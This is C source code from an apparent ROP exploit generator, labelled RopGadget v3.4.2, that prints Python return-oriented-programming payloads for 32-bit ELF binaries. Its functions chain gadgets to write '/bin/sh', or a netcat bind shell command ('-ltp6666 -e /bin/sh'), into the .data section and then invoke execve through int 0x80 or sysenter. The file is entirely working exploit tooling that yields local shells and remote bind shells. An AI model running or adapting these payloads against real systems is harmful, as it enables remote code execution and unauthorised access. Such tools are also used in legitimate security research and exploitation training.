/* partie 3 init eax = 0xb (execve) */ static void makepartie3(t_makecode *list_ins) { Elf32_Addr addr_xor_eax; Elf32_Addr addr_inc_eax; char *xor_eax_gadget; char *inc_eax_gadget; int i = 0; addr_xor_eax = ret_addr_makecodefunc(list_ins, "xor %eax,%eax"); addr_inc_eax = ret_addr_makecodefunc(list_ins, "inc %eax"); xor_eax_gadget = get_gadget_since_addr_att(addr_xor_eax); inc_eax_gadget = get_gadget_since_addr_att(addr_inc_eax); /* set %eax => 0 */ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_eax, xor_eax_gadget, ENDC); display_padding(how_many_pop(xor_eax_gadget)); /* set %eax => 0xb for sys_execve() */ while (i != 0xb) { fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_inc_eax, inc_eax_gadget, ENDC); display_padding(how_many_pop(inc_eax_gadget)); i++; } }
/* partie 2 bis init reg => %ebx = "/usb/bin/netcat\0" | %ecx = arg | %edx = "\0" */ static void makepartie2_remote(t_makecode *list_ins) { Elf32_Addr addr_pop_ebx; Elf32_Addr addr_pop_ecx; Elf32_Addr addr_pop_edx; char *pop_ebx_gadget; char *pop_ecx_gadget; char *pop_edx_gadget; addr_pop_ebx = ret_addr_makecodefunc(list_ins, "pop %ebx"); addr_pop_ecx = ret_addr_makecodefunc(list_ins, "pop %ecx"); addr_pop_edx = ret_addr_makecodefunc(list_ins, "pop %edx"); pop_ebx_gadget = get_gadget_since_addr_att(addr_pop_ebx); pop_ecx_gadget = get_gadget_since_addr_att(addr_pop_ecx); pop_edx_gadget = get_gadget_since_addr_att(addr_pop_edx); /* set %ebx */ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_ebx, pop_ebx_gadget, ENDC); display_padding(how_many_pop_before(pop_ebx_gadget, "pop %ebx")); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC); display_padding(how_many_pop_after(pop_ebx_gadget, "pop %ebx")); /* set %ecx */ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_ecx, pop_ecx_gadget, ENDC); display_padding(how_many_pop_before(pop_ecx_gadget, "pop %ecx")); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 40%s\n", BLUE, Addr_sData + 40, ENDC); display_padding(how_many_pop_after(pop_ecx_gadget, "pop %ecx")); /* set %edx */ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_edx, pop_edx_gadget, ENDC); display_padding(how_many_pop_before(pop_edx_gadget, "pop %edx")); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 52%s\n", BLUE, Addr_sData + 52, ENDC); display_padding(how_many_pop_after(pop_edx_gadget, "pop %edx")); }
void combo_ropmaker2(void) { int i = 0; int flag = 0; Elf32_Addr addr; t_makecode *list_ins = NULL; /* check combo 1 if possible */ while (tab_combo_ropsh2[i].instruction) { if (search_instruction(tab_combo_ropsh2[i].instruction) == 0) { flag = 1; break; } i++; } if (flag == 0) fprintf(stdout, "[%s+%s] Combo 1 was found - Possible with the following gadgets. (execve)\n", GREEN, ENDC); else fprintf(stderr, "[%s-%s] Combo 1 was not found, missing instruction(s).\n", RED, ENDC); i = 0; while (tab_combo_ropsh2[i].instruction) { addr = search_instruction(tab_combo_ropsh2[i].instruction); if (addr) { fprintf(stdout, "\t- %s0x%.8x%s => %s%s%s\n", GREEN, addr, ENDC, GREEN, get_gadget_since_addr(addr), ENDC); if (!flag) list_ins = add_element(list_ins, get_gadget_since_addr_att(addr), addr); } else fprintf(stdout, "\t- %s..........%s => %s%s%s\n", RED, ENDC, RED, tab_combo_ropsh2[i].instruction, ENDC); i++; } fprintf(stdout, "\t- %s0x%.8x%s => %s.data Addr%s\n", GREEN, Addr_sData, ENDC, GREEN, ENDC); /* build a python code */ if (!flag) makecode(list_ins); }
/* partie 4 call "int 0x80" or "sysenter" */ static void makepartie4(t_makecode *list_ins) { Elf32_Addr addr_int_0x80; Elf32_Addr addr_sysenter; Elf32_Addr addr_pop_ebp; char *pop_ebp_gadget; addr_int_0x80 = ret_addr_makecodefunc(list_ins, "int $0x80"); addr_sysenter = ret_addr_makecodefunc(list_ins, "sysenter"); addr_pop_ebp = ret_addr_makecodefunc(list_ins, "pop %ebp"); pop_ebp_gadget = get_gadget_since_addr_att(addr_pop_ebp); if (addr_int_0x80) fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # int $0x80%s\n", BLUE, addr_int_0x80, ENDC); else if (addr_sysenter) { fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_ebp, pop_ebp_gadget, ENDC); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data %s\n", BLUE, Addr_sData, ENDC); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # sysenter%s\n", BLUE, addr_sysenter, ENDC); } }
/* partie 1 bis | write //usr/bin/netcat -ltp6666 -e///bin//sh in .data */ static void makepartie1_remote(t_makecode *list_ins) { Elf32_Addr addr_mov_gadget; Elf32_Addr addr_xor_gadget; Elf32_Addr addr_pop_stack_gadget; Elf32_Addr addr_pop_binsh_gadget; char *mov_gadget; char *xor_gadget; char *pop_stack_gadget; char *pop_binsh_gadget; char *first_reg; char *second_reg; char reg_stack[32] = "pop %"; char reg_binsh[32] = "pop %"; char instr_xor[32] = "xor %"; addr_mov_gadget = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)"); mov_gadget = get_gadget_since_addr_att(addr_mov_gadget); first_reg = get_first_reg(mov_gadget); second_reg = get_second_reg(mov_gadget); strncat(reg_stack, second_reg, 3); strncat(reg_binsh, first_reg, 3); strncat(instr_xor, first_reg, 3); addr_pop_stack_gadget = ret_addr_makecodefunc(list_ins, reg_stack); pop_stack_gadget = get_gadget_since_addr_att(addr_pop_stack_gadget); addr_pop_binsh_gadget = ret_addr_makecodefunc(list_ins, reg_binsh); pop_binsh_gadget = get_gadget_since_addr_att(addr_pop_binsh_gadget); addr_xor_gadget = ret_addr_makecodefunc(list_ins, instr_xor); xor_gadget = get_gadget_since_addr(addr_xor_gadget); fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC); fprintf(stdout, "\t\t%s# execve /bin/sh bindport %s generated by RopGadget v3.4.2%s\n", BLUE, bind_mode.port, ENDC); /*****************\//us*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"//us\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************r/bi*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 4%s\n", BLUE, Addr_sData + 4, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"r/bi\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /*****************\n/ne*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 8%s\n", BLUE, Addr_sData + 8, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"n/ne\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************tcat*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 12%s\n", BLUE, Addr_sData + 12, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"tcat\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\0***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 16%s\n", BLUE, Addr_sData + 16, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************EOF**********************/ /******************-ltp*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 17%s\n", BLUE, Addr_sData + 17, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"-ltp\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************<PORT>*******************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 21%s\n", BLUE, Addr_sData + 21, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"%s\"%s\n", BLUE, bind_mode.port, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\0***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 25%s\n", BLUE, Addr_sData + 25, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************EOF**********************/ /******************-e//\********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 26%s\n", BLUE, Addr_sData + 26, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"-e//\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /*****************\/bin*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 30%s\n", BLUE, Addr_sData + 30, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"/bin\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\//sh********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 34%s\n", BLUE, Addr_sData + 34, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"//sh\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\0***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 38%s\n", BLUE, Addr_sData + 38, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************EOF**********************/ /*********************************** make now arg_tab[] ***********************************/ /* ** data + 0 = "//usr/bin/netcat" ** data + 17 = "-ltp6666" ** data + 26 = "-e///bin//sh" ** ^ ** +-- data + 38 ** ** data + 40 = data + 0 ** data + 44 = data + 17 ** data + 48 = data + 26 ** data + 52 = NULL */ /****************** data + 0 ********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 40%s\n", BLUE, Addr_sData + 40, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************* EOF **********************/ /****************** data + 17 ********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 44%s\n", BLUE, Addr_sData + 44, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 17%s\n", BLUE, Addr_sData + 17, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************* EOF **********************/ /****************** data + 17 ********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 48%s\n", BLUE, Addr_sData + 48, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 26%s\n", BLUE, Addr_sData + 26, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************* EOF **********************/ /****************** \0 [1] ***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 52%s\n", BLUE, Addr_sData + 52, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /****************** EOF **************************/ /****************** \0 [2] ***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 53%s\n", BLUE, Addr_sData + 53, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /****************** EOF **************************/ /****************** \0 [3] ***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 54%s\n", BLUE, Addr_sData + 54, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /****************** EOF **************************/ /****************** \0 [4] ***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 55%s\n", BLUE, Addr_sData + 55, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /****************** EOF **************************/ /**************************************** EOF *********************************************/ free(first_reg); free(second_reg); }
/* partie 1 | write /bin/sh in .data for execve("/bin/sh", NULL, NULL)*/ static void makepartie1_local(t_makecode *list_ins) { Elf32_Addr addr_mov_gadget; Elf32_Addr addr_xor_gadget; Elf32_Addr addr_pop_stack_gadget; Elf32_Addr addr_pop_binsh_gadget; char *mov_gadget; char *xor_gadget; char *pop_stack_gadget; char *pop_binsh_gadget; char *first_reg; char *second_reg; char reg_stack[32] = "pop %"; char reg_binsh[32] = "pop %"; char instr_xor[32] = "xor %"; addr_mov_gadget = ret_addr_makecodefunc(list_ins, "mov %e?x,(%e?x)"); mov_gadget = get_gadget_since_addr_att(addr_mov_gadget); first_reg = get_first_reg(mov_gadget); second_reg = get_second_reg(mov_gadget); strncat(reg_stack, second_reg, 3); strncat(reg_binsh, first_reg, 3); strncat(instr_xor, first_reg, 3); addr_pop_stack_gadget = ret_addr_makecodefunc(list_ins, reg_stack); pop_stack_gadget = get_gadget_since_addr_att(addr_pop_stack_gadget); addr_pop_binsh_gadget = ret_addr_makecodefunc(list_ins, reg_binsh); pop_binsh_gadget = get_gadget_since_addr_att(addr_pop_binsh_gadget); addr_xor_gadget = ret_addr_makecodefunc(list_ins, instr_xor); xor_gadget = get_gadget_since_addr(addr_xor_gadget); fprintf(stdout, "\t%sPayload%s\n", YELLOW, ENDC); fprintf(stdout, "\t\t%s# execve /bin/sh generated by RopGadget v3.4.2%s\n", BLUE, ENDC); /*****************\/bin*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data%s\n", BLUE, Addr_sData, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"/bin\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /*****************\//sh*********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 4%s\n", BLUE, Addr_sData + 4, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_binsh_gadget, pop_binsh_gadget, ENDC); display_padding(how_many_pop_before(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += \"//sh\"%s\n", BLUE, ENDC); display_padding(how_many_pop_after(pop_binsh_gadget, reg_binsh)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /*******************EOF*********************/ /******************\0***********************/ fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_pop_stack_gadget, pop_stack_gadget, ENDC); display_padding(how_many_pop_before(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # @ .data + 8%s\n", BLUE, Addr_sData + 8, ENDC); display_padding(how_many_pop_after(pop_stack_gadget, reg_stack)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_xor_gadget, xor_gadget, ENDC); display_padding(how_many_pop(xor_gadget)); fprintf(stdout, "\t\t%sp += pack(\"<I\", 0x%.8x) # %s%s\n", BLUE, addr_mov_gadget, mov_gadget, ENDC); display_padding(how_many_pop(mov_gadget)); /******************EOF**********************/ free(first_reg); free(second_reg); }